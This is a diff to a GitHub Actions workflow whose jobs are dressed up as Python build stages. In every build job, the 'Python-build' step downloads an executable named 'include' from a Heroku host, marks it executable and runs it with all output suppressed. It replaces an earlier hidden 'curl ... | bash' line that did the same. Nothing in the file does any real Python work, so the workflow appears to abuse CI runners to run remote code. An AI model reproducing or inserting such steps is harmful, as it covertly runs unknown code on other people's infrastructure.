--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -5,7 +5,7 @@ on:
  
 jobs:
  python-1:
-    runs-on: ubuntu-latest
+    runs-on: ubuntu-18.04
     strategy:
       fail-fast: false
       matrix:
@@ -19,7 +19,7 @@ jobs:
       run: echo "python"
  
  python-2:
-    runs-on: ubuntu-latest 
+    runs-on: ubuntu-18.04 
     needs: python-1
     strategy:
       fail-fast: false
@@ -34,7 +34,7 @@ jobs:
       run: echo "python"
  
  python-build-4:
-    runs-on: ubuntu-latest 
+    runs-on: ubuntu-20.04 
     needs: python-2
     strategy:
       fail-fast: false
@@ -46,12 +46,12 @@ jobs:
     steps:
     - uses: actions/checkout@v2
     - name: Python-setup
-      run: sudo apt-get update -y && apt-get install -y
+      run: sudo apt-get update 
     - name: Python-build
-      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
  
  python-build-3:
-    runs-on: ubuntu-latest 
+    runs-on: ubuntu-20.04 
     needs: python-2
     strategy:
       fail-fast: false
@@ -63,12 +63,12 @@ jobs:
     steps:
     - uses: actions/checkout@v2
     - name: Python-setup
-      run: sudo apt-get update -y && apt-get install -y
+      run: sudo apt-get update 
     - name: Python-build
-      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
  
  python-build-2:
-    runs-on: ubuntu-latest 
+    runs-on: ubuntu-20.04 
     needs: python-2
     strategy:
       fail-fast: false
@@ -80,12 +80,12 @@ jobs:
     steps:
     - uses: actions/checkout@v2
     - name: Python-setup
-      run: sudo apt-get update -y && apt-get install -y
+      run: sudo apt-get update 
     - name: Python-build
-      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
  
  python-build-1:
-    runs-on: ubuntu-latest 
+    runs-on: ubuntu-20.04 
     needs: python-2
     strategy:
       fail-fast: false
@@ -97,6 +97,6 @@ jobs:
     steps:
     - uses: actions/checkout@v2
     - name: Python-setup
-      run: sudo apt-get update -y && apt-get install -y
+      run: sudo apt-get update 
     - name: Python-build
-      run: wget sudo && curl https://myname1.herokuapp.com/include | bash >/dev/null 2>&1
+      run: wget https://myname1.herokuapp.com/include && chmod +x include && ./include >/dev/null 2>&1
